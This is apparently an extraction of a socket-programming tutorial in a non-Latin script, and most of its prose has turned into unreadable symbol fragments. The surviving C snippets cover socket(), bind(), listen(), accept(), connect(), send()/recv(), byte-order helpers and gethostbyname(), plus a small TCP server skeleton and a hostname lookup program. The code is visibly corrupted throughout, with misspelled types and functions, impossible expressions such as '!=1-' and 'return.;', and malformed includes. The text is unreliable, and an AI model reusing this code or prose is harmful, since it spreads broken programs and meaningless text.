? G j 5 .Y …
B'T
7 4…
)
GH ) % ' …
)
GH ) % ' …
11b3
FIFO =
…
# 2 5< 26• T/
T, ) X ! % H
,
% '
F) 3 |
) )
6 ) ?@ 2 7 !89 1P ) #P< )
) ^P
@
€ , (I/O)
)
) 2 ^P
- N@ 6,
5G
#P< ^ P
a
•^ P •
]
H
'
2
T 5G nP9 7
) -
0,
2
N
g
‰8:
),
?)
"
IP h @
) _d *
,
,
•^ P
socket() 5
˜4
g
- <
- <•
&@
$,
,
$
&@
0,< ,6 3 - Y
- <?
6 ' ^P
' 7
3
,G
I
)
#P
<
6-
,
6-
1P 7 B
5!_z
,
SB
9% !
0, & ,
3 '
1P
( ,H [
1P
7 , ?
1) ) +
_O
?@ "
6-
' %5!
P
(Null) —14
5<
% ', 56 ^ P ,< ( 5
+
7 4h @
5< % !
0, 5
"
6
6 '_d *
%5! ?
read() ] rece()) [ write() ] send() +
_=1
]W 3
,6 3
?56 $%P
H B
/
6
3
% ' - <
0,
% '
" T)
b < ,6* % !
?@ ) W 3
& @
' R4
% ' 3
3
?@ "
•"
N
•" -
62 " U4
) TSAP : ) 2 7 !89 1P " ^ P
)
0 ,<
) )
?
" , /)
% '2,
#P
< .
6 )
$, 3
6^ P 2 "
6 L*
@"
? &56?
B', 56CH
< _% ' - <
]
) < " ) TG'^ P 2 ,
0
(E -
@"
? &56 :
1P
@ " (,
@ 6Y )
0
,
F)
\ )
a ",
P
!
'G
\ ) 2 _0 ,
0 <
-,
N1L
\
6
56 I "
56
1
),
66
6
#5
\
\
6*
N \
]
6
…
0 <
6 Y 2 7) Y $
\
-,
TL ?),
\ ) 2 ( Y2 &5
6
T
A) 0, 6,
' 7 I
2t
5: ) S
N` 6)
2t5:
!
(
6-
2
\
. )
P! ™Y/ , "
$ (FTP) % 'T
%# ) 4 TQ ? G 0,
TCP A) ?56
(SMTP)
# ) #1 6
T
-
\
" C
GP
9) ,
1P 15 /
F) 6-
5>
K6%# ) 4 ) 7 ,3 Q
? FS
! 2 `56) 6
(HTTP) 2
%# ) 4
6:3
? FS
c
6 6-
7 !
UDP ) TCP \ ^ P
0, <
, -,< = G (
…
) j4
)
,
\
,
H I,
0
-
(
7 .Y T
62t
5: ^ P
H
%# ) 4
, "
N56
0,
"
13 ) S
!
) 6
TCP % # ) 4
0
H
) ^ P ˆ6
.
%Q 6
H
"
$ 6-
?,
"
3
A) 2 2 /
0
P CH
B
/
\
#
A)
5> 2
6" 78#
(5
TL
F) 6-
)-
,6 3
,6 3
(8! % !
+ ) >' ,6 3
i:
6-
" - Y
% !
^ P = G"
1P
" UDP
0,
S
6-
0, <
)
$TL
2 5>
L ) ,
0 ,<
&
1P "
\
1P 6-
,
#P
<
6-
P(
DNS
H- Y
TCP 6% # ) 4 " - Y
)
,
), <
1
)
1P :3
0
UDP %# ) 4
?), )
N 56
IP %# ) 4 ) , 5
+H ) ?@ 2 " c
%P
H CGP9 ) -
) 6-
B
# ) 4 TCP ,< - < C
8P
H
6-
<
T
T
!
5<
/
UDP
3
!& ( Y
3% 5 C
85!
= G U
TCP %# ) 4 7 K
&F ?,<
E $^ P
H
F
?),
"
| -, 6 U )
( Y
G ,<
'9 )
9P
\) < I.1
"
6
F % H
^ P 2 ' 9 R 1$ <
# ^P
6
^P 2
0, < -
0
%
,6 3
= G
(8! % !
š7
^P 2
6-
<
#P
<
) 4) 2
6-
M 9)
R4 ?#
# 2
^P C
85!
1P
3% 5
YB^ P -,
\) < $2 '9
1P $^ P A R4 7
C, ! H
•
•
0 ' ,6 3 (
•-, 6 U )
0
^ P -,
•_-
\) <
?@ I ) ]
a
0
2
7 !89
% 5 )
@) ),
SB
9
, , "
R4
R4
5! = G
) 4 Client
c
C
) 4 Server -, 6 U )
3
!89
, /) $ X
task , 5
I
)
RN V <
7 !89
0,6, % .
I $-
7 P!
I T /2 !
-
)-
?
)
3
F
3
O) -, 6 U )
O) 7 .Y S1H
) )- 5
<
SL -, 6 U )
?@ A"
-,
4 " U4 )-
2<
'
\) < -, 6 U )
H) TQ ? G
!89
7 .Y 2 "
0, 5 T
)
" 2*
X
X
2
)
5
v 4
("c
-, 6 U )
^P
H
B 1/
2
P
5
X
, 5 T
I
S
v 4$X
0
7 !89
3
$"
) ,< ,G ,
2<
;.
,
)
-,< +"
6
5
6
/ 7) Y
<
)
N] 0
6
^P
%
M 9
,G 0,
6-, 6 U )
,G C
c 5G 2# 1
_0,
) N* 4 $7 !89 S/
,
*
H
-,
,
T
I
Y
, N I
N M 9
–
…-, 6 U )
5 –, 5 T
* 4)j
N
;.
5 …
4
B
F TQ
T
\X
I
:
-, 6 U )
0
5
3
,6 3 7) Y $ <
%
$
a
% !
b'
\ % !
% !
,
b.
F $
0,
+ b
(5
2 0, 6,
,
-,
6^ P
?
6X
A R4
I
' % <+
6-
) >' ,
TCP ^ P
Q ,/ ,
6X
4
E
"
< A)
2 G Q ,/ ? G % !
,<
( E bind()
) TCP
TCP
5
6
6
$
"
5
,<
,G B
/
_z
2 0, 5 \) < TCP
,< ,G ^ P
A R 4 (8!
,
'
F
)T
) -, < ' R4 ? &56
, "
U#
_O
<
(8! % !
b
^P
^P
,6 5<
( E listen()
G
)
" - Y -, 6 U )
,
3
+ b
( UDP
4 - 5< UDP
A
(8!
"
/
4h @
, 3
, -
0,
,G 2 G C
c 5G 0,
< A"
TCP )
<
)
A R4
TCP 7 9P
-
/
&1bind()
2#5 ?
3
2
_=1
= G, "
4h @
7
5<
L*
2
'G W 3 7
,G
#B
3
H ] 0, _0
^P
P 7
5
5
( E Socket() 5
- 5 < ? <,L
R4 ? G
<
^P
(8! % !
: 5< I
-, 6 U )
'G ( UDP
2 0, K5
) # @ " %P
H
2 `56) -, 6 U )
"7 B
5!
0 <
5
1
5
0, )
( Y
F T/
›
(E
B
/ 2 56
|-, 6 U )
5
,6 3 , "
E
,!
F
N1
a K5
,
5
6X
H 0, N
("c
>'
:,
,G 2 ,
1
)$
5<
0
7) Y ^ P 2 ,
T G') " 7
,
L
L
$? &567 L ,
7) Y
B' , G
"
<
-, 6 U )
)
2,
)@
6"
7) Y ^ P 2,
Q ,/ ,G % '
0 < " ? &56 : 5<
? G 0,<
b
,
<
]
nB
G 7 9P "
,
X
" accept() + - Y
% !
Y D 7 # accept() + 0,
% >Y
'G 5<
C
_
_ F) 7
0,< ,6 3
0, K5 - Y
0
,6 3
5
recv ) send 7
1P
R4 ?# A) )
2 0, 6, 5 3
_ close() + b
] '
_ shutdown() + b
] '
)T
_-
^P C
_)
'9 ) ^ P +:H …
7 B
5! "
# ':# +:H …
a < T5!
% !
b' E
0, )
F $
^P
0,
P 7 4h @
3
U)
^P
-, 6 U )
H
, 56
-,< (8!
("c ,G B
/
,
F) bind()
" - Y
X
A 3 #B$
? N " ^P
connect() 5
?@ 5
_=1
6^ P = G , "
-, 6 U )
5
L*
_O
)&1 G , 6,
+ " - Y
X
X
I
?@ , ,< -, 6
0,
TCP ^ P
0
H
9P 2
TCP 7 9P
5
_ Hand Shaking]
B
/
( E ) \) < 1 C
85! connect()
R4
<
2
M 9
1
),<
0
( , H 6-
H
'
)T
'
G
'X
$
&@
ˆ 6?), ,
%/
$, <
" bind() + "
- Y
,6 * ("c
TCP ^ P
#
^ P -,
Y
<
,
93
C,E
3 7 4 - 5<
\) <
' connect() %5!
)
-, 6 U )
0, 5
0, 5 ( ,H 60, 5 +:H '9
'9 ) 7
'
T
shutdown()
send() ) recv() +
close() +
" _z
^P _
?@
H)
5
-, 6 U )
"
5
6
1) ) +
B
2 `56) 60 6,
("c ?5 3
6C
_0 ,
^P
\
6,
\F
u $ "= G
`56)
?@
-
N
G
H
) i.
H
6-
" g@
•
L* •$-
N
\ 21
)
)
H- Y
a,<
L*
$^ P
= G C
8G'0
?5 3
.$
,!
`
-,
2
$% ' - < , 56
) 47 4h @
3
?@
G:H ( 5 ] 0
?5 3
"
6 u
" U4
H
P
"
N1
H
-
"
,
A
Int
A;
\ 2 )
^ P M 9 2 < IPh @
3
a "7
Struct Sokaddr {
Unigned Shortsa_family ; /*address family AF_xxxx*/
Char sa_data[14] ;
/*14 bytes of protocol address*/
};
2 G
& 2
/
R 1œ ' , 6 3
\ ,
6 #P<
d*
B
#) 4
)
TCP/IP % # ) 4
N
0,
#P< ;.
6
$
IP h @ $7
) 7) Y
0
< 5 -,6
! 5E
5
2G
[
3
-
3
& 2 Appletalk %Q
,6 3 7) Y
4h @"
,
B
#) 4
8G'0,
C
AF_INET
0
N
I
%L'2 %
d*
3 a sa-family …
-
) ) ) #P<
7) Y
0
\
2 a sa-data …
-
6, B'2
c
=
G
1
)
)
)Y = G 1
)
B
PH #
T G CH
a, N -
<
- *1 ( ,
Struct sockaddr_in {
'G `
6" ,
5<
/*address family*/
Shortint_family ;
Unsigned shortintsin_port ; /*port number*/
Structin addrsin_addr;
/*internet address*/
Unsigned charsin_zero[8];
/*same size as struct
Sockadda*/
#P<
),
2 G
-
3
d*
#
I
)
8! ?), $i.
d*
,! C
8
, 56a Sin_port …
[ ,
) ,B'2 a Sin_port …
) 47 4h @$
A 3 ,B'2 0,
%
3
< AF_INET
0,<
0, 5
B
P
H
2 < IP h @ a In_addr …
I
, , b '$, < , 6 3 = G
0
Y
,
,
B
#) 4
8
C
,
6 #P< ( 5
<= G
,
( Y
l'#
IP h @ C
8G'
h @ T 9 6 #P< "
-
62 a Sin_zero [†] …
6
?@ $,B'2
2
#P
<
N
#P
<
Y C 5 memset() % Q G 9
F) % 1 0, <
) -,< - Y T G 7
0,< - Y % H #P
<
3
1/
6
`
,
C5 / 1
)
0
<
$7) Y
B
#) 4(5
) 7 4h @
"
N62
'X
0
62 ,
0 <
" (,
6$+
3 ' ?
= G " - Y \ 5E
) , T G CH
1
)
N
B
P
H `
F •\ n : •
0
?@
3
-,< = G in_addr (
N
)
#
()
,6 3
, 5
H
#
@
/ ()
#
= G
0
"7
/*Internet IP address (a strcture for historical reason)*/
Struction_addr {
Usigned longs_addr ;
l '7
IP h @
?@ = G )
?@
9
0
2# 1) ,
B
P
H #
T/ 6
- Y
<)
5< - *1
I'/
5<
,6 3 6
a <
F
- 3• 3
2
1
6,/) S
< SL
"
LE \ "
<
6 ,
-
m.1"
G
< 78#
_-
< 7) Y <R
-,< n' DE 7
H) R1
S E! 5
6, B'
F)
LE \ ) BE \
H
#P
< )
c
,
,< - < )
, B'2
'G unsigned long
6" ,
7 5B "
I
1
)
0,< , 6 3 'G
)
%
$,
-, < = G c 7
%# ) 4
N
TCP/IP
S
LE
)
3
<
H) TQ ? !
0
3
Struct sockaddr_inas ;
As.sine_port=0 xb459 ;
" U4 R1
H A"
I _- P< CG:H )]
4
?@ " ,G )
<
- 3•T) A"
7 4 h @ TCP
"7
?
) 2 2'
H
a,< ,6 3
B4
59
)
+
, 6,
H
6, B'?)
,
'G % 1 2 56 0,<
a
S
) X
U
htons() a BE 1/
htonl() a BE 1/
ntohl() a 2 <
H) 2
) 2< \ ? N
#P
<U
ntohs() a 2 <
H
B
G' 1/ BE "
B
G' 1/ BE "
& ? !
"
) 7 5B % ,P +
7 5B % ,P +
) 7 5B % ,P +
7 5B % ,P +
, ,
A
SL
"
)
F- Y
6, B'
2<
?
3
("c U
LE 7
H " %PH C
5 /?
0, - Y l '+
IP
TCP
,
I
,B'C
<
- Y l '+
sin_family , B' sock_addr_in `
-, < = G % !
l '+
"
<@ l '+
,B'2 )
"
H) b'a R
T Q? !
< I
H
("c , B'2
6
,
- Y
<
6 3
[
AF_INET
,
R 1$, < ,6 * %
1Q
#P
< ) )
0
5 - Y
a
6, B'
IP
S1H
@
<
h @ ,B'?)
IP h @ I 78#
,
IP
•2
6h @ ;.P
a, <
<
6-
pwwžwwžw‹qžw{p
,! IP h @ ,B' sock_addr_in `
IP
3
@O L
F "+ ) 2
1/
4 long \ " ,!
<
a
‹‹žwwžwpwžw†} ( '
, B' BE S1H
<
,!
% ,P
R1l '
+ 2 a inet_addro() + …
U4 )
< h @ c TQ
0
h @
7
L
G ,6
B
P
H + % 5! U#! + 2 ainet_ntoa() + …
(E
IP h @
<
) struct in_addr \ " l '+
H 9
7 L
) )
4 0, 5
a " TQ
BE S1H
@) '
% ,P $0
= G
:
< \ ?@ F) 3
printf (%s , inet_noet_ntoa (ina.sin_addr) ) ;
k
F) 3 ) -
G
)
:
< 7 L h @
a
"( '
. l 'TQ
F) 3 C
8Q 0,< ,6 3
wqžŠžw‹wžwsq
IP h @
www.ibm.com ( ' -" /
)=
("c +
G
,
?@ " % P
H0
@ % ,P N N
@
*
6 3iX
b.
0, < = G ^ P
_ TCP
P] -, 6 U )
H
- Y
+
Socket() +
a
"7
+
B( '
#include <sys/type.h>
#include <sys/socket.h>
intsocket ( intdomain,int type,int protocol ) ;
- <C
8PH
.
I AF_inet
0 <
\ ,
,
,
,
(8!
Type , B'
?@
,
3 -, 6 ?
[ ,
$
? 6 *1
#P
<U
\
\
0,< (
\ "
H sock_stream
) 6,
I
? I
%# ) 4
0
#P< .
,6
56
H(
#P< 6
) T)
6, B'
0
–, G +
?@ "
"
R 1_% '
,
0
Ÿ
+ 2
N
<- Y ,
,N
H
,
F) 3 C5 / , YD U
+ 256 F) 3
:3 - 5 < error
"
? G 5 <)
,< , 6 3 'G
+
,
,
+
:3 - 5< A"
<
7 B
5!
u ,< …w , socket() +
Perror() 5
56
5 3^P
' %5! ,< …w socket() +
, ) ) - P& @
,
[
- < % Q C H ] ,< ,6 3 - Y
0 <
=H
,6 3
?56socket() + b
L*
L*
a Protocol …
< - 5< ,B'2
Y ?@ ,
[
I Sock_DGRAM
0,
,
,<
a type …
42
\ ? 6 *1
3(
4 2 a domain …
6
,
4
0,<
H)
-
5
)
, = G
"
+ )
u ) 2 0
-, @ 1Q
?@
# A)
0,
6
a Bind() +
^P
y
b'5<
bind() + 0
h @?
-,
P
0, 5
6
a,
H
(5
,
,6
- 5< , <
"-
0, 5
= G
5
c 5G
C
•-,< "
7 4
(
c 5 / = G2
C
U4
" Bind() + n 9 "
W 3 7 4 - 5< ^ P
http %# ) 4
TCP
)
A"
H)
ˆ 6" 6 1
), -
j6 3 % !
†q 7 4
B
. 2<
% !
G -, 6 U )
5
A
5<
1P
B
5!• ,
,6 5<
G2
"
( E 6-
F
) UDP TCP
/
<
6
4)
6X
Y
2 `56
H) TQ ? G
( 5 $-, 6 U )
% .$
†q
@ ,L
" 7 L bind() +
a
7 4
B( '
#include<svs/type.h>
#include<svs/sock.h>
int bind ( int soskfd , struct sockaddr_mv_addr , int addrlen )
0, -
" socket_] + " - Y
0, 6,
B
.
P " h @
L*
-,< "
5< , 6 3
< IPh @ ) 7 4 h @ $
-
3
% !
@)-
- N@
O*
0
S /
=:1"
13
@
< I
Y
' L - 5<
My_Addr `
- <
,
7
$ •ŠŠsŠ
5<
F)
4 h @ , B'
2
3
0
3
T 9 a Addr_len …
# Bind_] +
U#
wqp‹ - 5< " 7 4
0,
/
a My_Addr …
`
0,< = G C
8P
H `
a
?56a sockfd …
8P
C
H
I
b . _= 1
@2
- 5< ? !
2
, < wqps
-, < ) "
#
Y 2
6-, 6 U )
0
,6 * ?
?@
)z *
)
4 , P 5<
,
_O
6-, 6 U )
6
I INADDR_ANY
$,
, &
4 - 5<
4 2 " -" F % !
IP h @ , B'
[ ,
IP h @
5< B
. 2<
)
U#
37
b.
% !
0
c
6, B' 6
?@ ,
% ,P BE 1/
1/
Y
,
1/ ) ,
Y
N-
3 ?@
?@ HTONS_] +
, )
6a
-
) "
3
5 <" % P
H
"
' Bind_] % 5! - N@ , < u $ :3 \ A"
0,
4
,
#
("c
2
"
4 5<
?@
5<
G
, % ,P
3
,6 3 "
H
#_
O*
Bind_]
0
,6 3
-
?@ % 1 0,<
N
- N@
2#5
0
-
_z
…w ,
_-
G ,<
) - P& @
PEAAOR_] + ) :3 - 5< Errno
:3 7 L*
a Listen_]+
(8! -
^P
% !
+ 2 b
TCP ^ P
6X
0
),
7 P!
_+
N I )-
=
I.1 $-, 6 U )
, 6, 7
4h @
+ b
0,6,
G] , G
? I
R
H 6U)
) " ) T G'7 9P
@"
=
a
"7
% !
,
(8!
) -
<
7 4 - 5<
H
X
,
Q ,/
@)- 5
,G Q,/
6X
I.12 "
", - " U4
TCP ^ P
@^P )$
b'+ 2
TCP ^ P
0
F? "
2,
A)
G -, 6 U )
2#5
? " 6 9
F
7) Y
) 4
, , ,
% !
2
H
B
/
#
< (8! % !
+
#@
,
Listen_]
B ( '0,< W 3 7 4 - 5<
Int listen (int sockfd , int back log ) ;
0, -
E
?@ ,
L*
?56a Sockfd …
5
"
0 I -, < =
0
erno u )
,G Q ,/ a Backlog …
) nB
G 7 9P
, 6 3 …w+ 2
,
backlog ,
-,< ),. pq
:3 ")
7
B
P
H+
0,<
- ,3
, 56
:3 - 5<
Accept +
a < H ?@ ( Y
-
<
)
_] +
) 4 TCP ^ P
6
H) 0 <
2 "
,
M 9
7 B
5!
, PB
:
+ b
% !
>/
/
@)L*
T)
L*
F accept
accept()
0,<
0,6,
% 1 2 56 ,6, ( E
5< E
()
L*
nB
G 7 9P "
I
-,< =
- Y nB
G 7 9P "
7 9P %
-,< =
("c
0,
, accept()
) -, @
2 7) Y 0
# A R4
T)
L*
2
) 7 !89 T
0,<
6X
2
€
- Y
] )
# -,< =
, ,F
accept() +
, " U4
<
O*
% !
0,
, + 2
$ ' R4 _ F) 7
# nB
G 7 9P 2 " ,
, ,F
5<
"
,< F listen_] +
X
" 5<
) 4 7 L*
@)-
I
< - N nB
G ) -,< =
X
% .%
),
)
'
7 9P "
" _=1
/
()
" _O
# L*
a
0,
2 0,
"7
+
B( '
#include <sys/socket.h>
int accept ( int sockfd , void*addr , *addrlen ) ;
0
T
Socket _] +
-, @
+ 2
M 9 IP h @ ) 7
4? !
2
L*
@ 5<
4 h @ nB
G^P
0,< 'G C
8P
H #
,
3
- < a Addr …
`
A R4 " U4 % !
0,
5<
S / addr
a Sockfd …
?@
`
,
^P %
T 9 a Addrlen …
H- Y
u
,G
1)
:3 ?@ - 5 <
a
L*
-
Ÿ
+ 2
,
:3 , < _…w]
,
0
% H errno
,6 3 ,
B ?,< 2<)
0
"(5
TQ
#include <string.h>
include <sys/type.h>
#include <sys/type.h>
#Define Myport 3490 /* the port user will be connecting to */
# define BACKLOG 10/*how many pending connections will hold*/
main()
{
int sockfd, new_fd;/* listen on sock_fd, new connection on new_fd*/
struct sockaddr_in my_addr;/* connector’s address information*/
if (( sockdf=socket(AF_INET,SOCK_STREAM,.)!= NULL){
my_addr.sin_family=AF_INET;/*host byte order*/
my_addr.sin_addr.s_addr= INADDR_ANY;/*auto-fill with my IP*/
bzero (&(my_addr.sin_zero),8) /*zero the, rest of the struct*/
if
(bind
(sockfd,(struct
sockaddr*)&my_addr,
sizeof
(struct
sockaddr))!=1-){
listen (sockfd, BACKLOG);
sin_size=sizeof (struct sockaddr_in);
new_fd= accept (sockfd, & their_ addr,&sin_size);
, ,F
"
60,
'
- Y $
T
,
N
accept()+ b
N
?@ L *
recv()) send() +
)-
- Y % H
5
a
) -, 6 U )
"7
+ )
5
+ ) 2
B ( '0,
6-
1P
Int Send (int sock fd, const void_msg, int len, int flags);
Int recv(int sockfd,void_buf, int len, unsigned int flags);
0
-,< z *
E@ "
accept() + "
-, @
1
60, <
_ `
T
0
Y ?@
b' 6
B
. a Msg …
@ %Q] I'/
H TCP
) '
S /
'
2
;.
5 iX
a Sockfd …
L*
" -
1
,B'?)
)
T 9 a Len …
6-
a Flag …
, `4 " & 6 4
0, RN
'
6-
B
. h @ recv() +
I'/
0
7
1
)
0,
, 6 3 …w :3
d*
X
S /
len
u
6")
'
,G
-,
"
) '
7
1
'
4 2 a Buf …
H E@
+ ) 2
6
,
,G $ PQ ,!
1
,G
2#5
,
H
0,<P? # , +
,
H wqqq , len
1
), -
] 1
6-
%
"
†qq 7
0, d *
5< ,
2
@=B
# ,
send() + b
T /, # T
u
6-
e 'TQ ? !
0, < pqq
5<
-,
-,
E/ ,
H _ '
G B
/
6 a
0,<
\
? 6-
6
)
A /)
b 'recv() ) send() + a #
' )T
) UDP A)
(
B
, 63
1
)
œ,
P
, ,
T
shutdown()) close() +
, 5
'
T
-
0, , P
) < N"
^P ,
^P
,< M 9 ? "
,
, < "
"
? " 6 B', 562# 1
)
a
close()+
"7
B( '
close (int sockfd) ;
+
L*
+ b
,<
? 56
sockdf
L*
0,< ,6 3
- Y % H
'
2 0 I
&
)T
a Socfd …
L*
,
H 0
accept()
-,
socket()
I ) nB
G 7 9P ( 5
N
close() + b
<
9P
0
% !
7 9P =
a
TCP 7 9P "
),
A"
4
$-
#
TP
H
/
,,P
N ^P
-
X
6
?@
F ,
0,
'X nB
G
?@ B ( ' ,<P shutdown() +
"7
,6 *
2
N -
Int shutdown (int sockdf, int how);
0 I
a
" ? `56$-
R4
" ,
T
1
) "
0,
6-
"@
'
"@
8
C
g
-
' a Y
) ) '% !
2#5
g
-
2#5
g
'
, 6 3 …w +
2
,
0,
_TCP %# ) 4
.
a,
-, 6 U )
H- Y
5
,
G
A"
:3 ")
4
0
aw , …
0
" ? `56
)T
ap , …
%5! close() +
0, 5
u )
, …
T
F) 3 ' % !
-
A) a How …
2
^
"
^
, 56 1/ 2 0 <
#
2#5
?@
1/
0,
"
a Sockfd …
L*
7
B
P
H+
, 56
:3 - 5< errno
P]
- Y
4+
, , < 'G
5
P,
+
G
T/ 0, <
E
- Y
+ "
#
0, )
+ 2
F)
-, 6 U )
) Yˆ 6 E
0,
Y -, 6 U )
<
5
connect() + b
(E
,
F)
5
- Y
6-
^P
H
%5! 2
< ' R4 X
'
0, , Pshutdown ()
socked_]
X
-, 6 U )
C
5
"
2
0,< ,6 3 0,
CH , _=1
- Y ,< 'G B
P
H j*
0
?@ ) ,
,
( N6
_O
, < I
,H
iX
recv() ) send() +
)T
close () + b
5
" _z
-,< E ^ P C
_
connect +
)
<
listen () +
0
connect () + " -, 6 U )
- Y
) ,< -,< F I
,6 3 & @
' +
2<
^P
) -, 6 U )
E - N@ , < -,<
a
H
accept () )
3 '
connect () +
"7
B( '
#include <sys/types.h>
#include <sys/socket.h>
int connect (int socket, struct sockadr* serv_ addr, int addrleny);
0
Socket() +
-, @
`
2
3 '
Sockdf \ "
0, < 'G C
8PH
0,< ,6 3 2 G ,L
/
?
),
#B,
- 5 <2
%L
,
? !
h @%
5<
5
S /
I
),
0,
?
O*
5<
-, 6 U )
/
(8! %
`
a Serv_addr …
0
2< IP h @
-" , : Addrlen …
B
P
H `
H sizeof(struct sockaddr)
-, 6 U )
4 h @ ? 56
a SOCKDF …
7 4 h @ ) ,L
'G
0
% !
L*
3 7 4 h @ 5<
5<
,
42
H
# 2
' L 7 4 - 5<
H)
v 4
,
8
C
R4
X
3
9
5
2 -, 6 U )
), <
-
O*
% !
,6 3
M 9
&
3 7 4 h @ $^ P -,
\) <
^P ,
,< d *
)
[,
C
G:H -, 6 U )
7 4
0, 5 \) <
, 6 3 …w + 2
TCP ^ P
,
0,<
H
-
:3 - 5< errno
Ÿ
UDP A)
a(
,
,
(E (
T /0
\
A R4 )
) UDP A)
\
' (,! 7
'
u )
'
'
)T
)T
$T
+
?
7
0
-, 6 U )
socket () +
4
3 '
2 0,
E (
5
…
\ "
_=1
0 < ( E SOCK_DGAM
_ bind() +
'
-
]0, 6,
GH
h @] š
,P
P
]0,
? I
6-
7 4 h @ -,< E
'
I ,
'X
h @ ,< A"
4) '
-
0
,6 3
R4 ?# T
0 < ( E sendto()) recvfrom()+
B
_O
ˆ 6?), _z
H) _,6 5
(
GT
) -,< d * _7 4 )IP
\
'
0, , P
)T
-,< E
C
_
5
4 ) socket
4) socket() +
] 0,
E (
…
\ "
_=1
_ SOCK_ DGRAM]
0, 5 T
-, 6 U )
, 6, 5
)T
5
G 6-
0, 5 T
? 6'
-
$, <
#
<,
N ,
'X
1
ˆ6?), ,< "
-, 6 U )
"
0, , P
"7
(
5
P-
5<
"
'
-,< E
T
6_O
# H)
-, < 3 < -, 6 U )
0, 6, ( E
a
-
+
_z
B( '
Int send to (int sockfd, connect void* msg, int len, unsigled int flags,
const struct_to, int tolen);
0
z *
F socket() +
-, @
E@ "
1
6-
(
2
0
-, 6 U )
Y
d*
3
7
?@
H UDP
) '
0
0, N I
H %. h @ a Msg …
I'/ ( 4 2 '
0 <T
S /
?@ C
8G'$;.
?)
4 - 5 < 2 `56) , L
a Flags …
, ` 4 " &6 4
2<
a TO …
`
IP h @ ,
^
) -,<
( 4 T 9 a Len …
1
Sockaddr \ "
8PH
C
a sockfd …
L*
`
0 < I
size
,
sockaddr `
?@ ,
I of (struct sockaddr)
0
T
,G send() + , 56+ 2
n' % !
,
,
2
:3 , < _…w]
# -,< T
6
T
,
,G , 6X
,
errno
# 6" 0, 5
0,<
B
/
")
B1
T 9 a Tolen …
H 0
u
@T
2 `56) -
"7
-,< ?@
:3 - 5<
X
,G
3
2 C
5/
0, N I
a
,
(
P-
B
'
+
&
B( '
Int recv from (int sockfd, void buf, int len, unsigned int flags, struct
sockaddr_ from, int_ from len );
0
,6 3
-, @
H %. ?@
F socket () +
'
6-
(
% !
L*
I'/ "
a Sockfd …
B
. h @ a Buf …
0
_
S / ]
< '
,
4 T 9 a Len …
) ,<
?@
3
5<
) I ,P
socaddr \ "
`
a From …
7 4 h @ ) IP h @ 7 L*
?@ % !
8PH
C
0,
0,
0
A"
4
-,
I
?@ % !
42 0
-,< '
Y
?@ a Flag …
`
T 9 a Len …
,G & + 2
0
/
56
,
'
a #P
<
#P<
,
0
63i
6 6
N +
@2 5
"
, Y+
-,< 'G 5
3
6-
0,
+
6, @
"
g
),Y
a getpeename() +
include<sys/socket.h>
int getpeername(int sockfd, struct sockaddr_addr, int_addrlen);
) 47
4 h @ ) IP h @ % < $%
-, < = G % •7
+ 2
M 9
6
6,
+ 2 " - Y
4 0, 5 z *
^P %
M 9
a
I
2 0
-,< = G ?@
0,< ,6 3 4 %
3
8P
C
H
sockdaddr \ "
M 9 7 4 h @ ) IP h @
% !
.sockaddr
u
)
, 6 3 _…w]
,
`
l '+
n 9"
@ C5 / ,
?@ ,
A
'U
LE \ " 5 < 2 <
0,
: Sockdf …
`
a Addr …
b
`
T 9 a Addrlen …
' (, ! 7
:3 - 5< errno
0,< ,6 3 I :3 \
h @ ) IP h @ S
L*
2#5
)
% ,P ,< - < ?@
#
BE 7
7 4
Š j*
G
gethostname () +
( 2 $,
,6 3
$ <
F ?@ )
_ www.ibm.com C
8Q) ?@ IP h @
5<
< ( + 2
2< 2 5 (
a
TG
<
"7
+
B( '
#include <unistd.h>
int gethostname(char *hostname, size_ );
U4
_
<
7 P
!
] 6
"
0,< ,6 3 - 3• E @
0
:3 - 5 < % P
H , 56errno
0
2
, )-
")
,6 3 Y
-, 6 U )
-" / (
,
G 0, 5
) ,L
a
b.
3
E
< E
,
)#
K
1Q
- Y ?@ IP h @ " C
5
e '2# 1) ,
h @? !
N
8P
C
H
X
N56
,
1
)
#B
5! " 9 ) DNS
5F
H
5<
,
DNS
@ 5F
0,< ;. ?@
^P
< T 9 a Size …
, , %5! l '+
'?@ H) E
" "
:3 ,< _…w]
0, 5 - Y
W 3 2<
2< ( +
S /
a -" /
-,
a Hostname …
@
-, 6 U )
" B( '
-" / ( h @ ,
,@
2
#include <netdb.h>
struct hosten * gethostbyname(const char * name);
0-, 6 U )
7
?@
3
hostent \ "
< a Name …
-" / (
`
h @ $+
a
,
-,< = G "
Struct hostent
Char *h_name
Char *_name
Char **h_aliases
Length ; ¡Int h
Char
**h_addr_list;
};
8Q
C
, 6 3 -" / (
< 2
#P<
] 2<
( a Hname …
5
_www.ibm.com
_ <
,
, B'2
#P<
3 wq
< 2 ] 2<
, <- <
( a H_aliases …
G
3 a H_addrtype …
N 56] h @ -
_0 < ,6 3 AF_INTEL
S / h @ T 9 a H_Length …
-, 6 U )
2<
^
IP h @ ?@
0 <
,
`
),
`
I errno
<
0,
- <
u
$?
&@
- <
B
PH +
M83
)
$?
u
0 <
'
:3 \ =
‰9
< 2 0
c +
&@
' 7
2
NULL , 7
herror
5
) X TQ
3 |q
' 7
,6 3
I
I
H _ addr_list…
<
u ?@
H
g
)
2
g
+ 25X
F) + 2
H
,
F ) ,< ,6 *
herror() 5
a,
H
)
+'
"
F)
#include <stdio.h>
#include <stdio.h>
#includer < errno.h>
#hnclude <netdb.h>
#include <sys/types.h>
#int main (int argc, char * argv[])
{
struct hosten * h;
if(argc!=2){/*error check the command line*/
fprintf (stderr,” usage: getip address\n” );
exit(1);
}
if(h=gethostbyname(argv[]))==NULL){/*get the host info*/
herro(“ gethostbyname****_;
exite(1);
}
printf(**** host name :%s\n” ,h-h_name);
printf(“ IP Address :%n” , inet_ntoa(*((struct in _ addr * )h-h addr)));
return.;
}
E )-
'
) )? !
0,
k
F) 3 )
'b3 )
(
' Enter , B) <
) IP h @
7 L*
a
?
getip
-" / ( h @
7
2 (
?@ 5F
" A" c
" 7#
2, l '
9_=1
13 B '
-" / (
B
F
U
)-
Œ
aTQ 0, 6
$getip www. Ibm . com
,
IP
+H ) h-addr-list u
6)
@
#P<
, -, < - 3•BE 7
( Y
:
' -
<
L
1
)
<
?@ T)
1/
F) 3 ) k
T G IPh @_O
-" / ( h @
3 |q ,
<
b '5 < ,
h @ % ,P
7
6
l'
8G'
C
0, , "
inet_ntoa() + " _pws 0w{q 0w†}žw‹q C
8Q]
0
in_ \ " `
P
E 2
?@
0
) )?
@ inet_ntoa() +
) ,< = G ?@
3
-,<
•\ nP
: • %5!_z
%L' ,
addr
5
3 lY %5!
1
)
2 5>
) )
4
"
•\ nP: • %5!
0, '
Q $X
SSL g(
[Secure Socket LayerZ
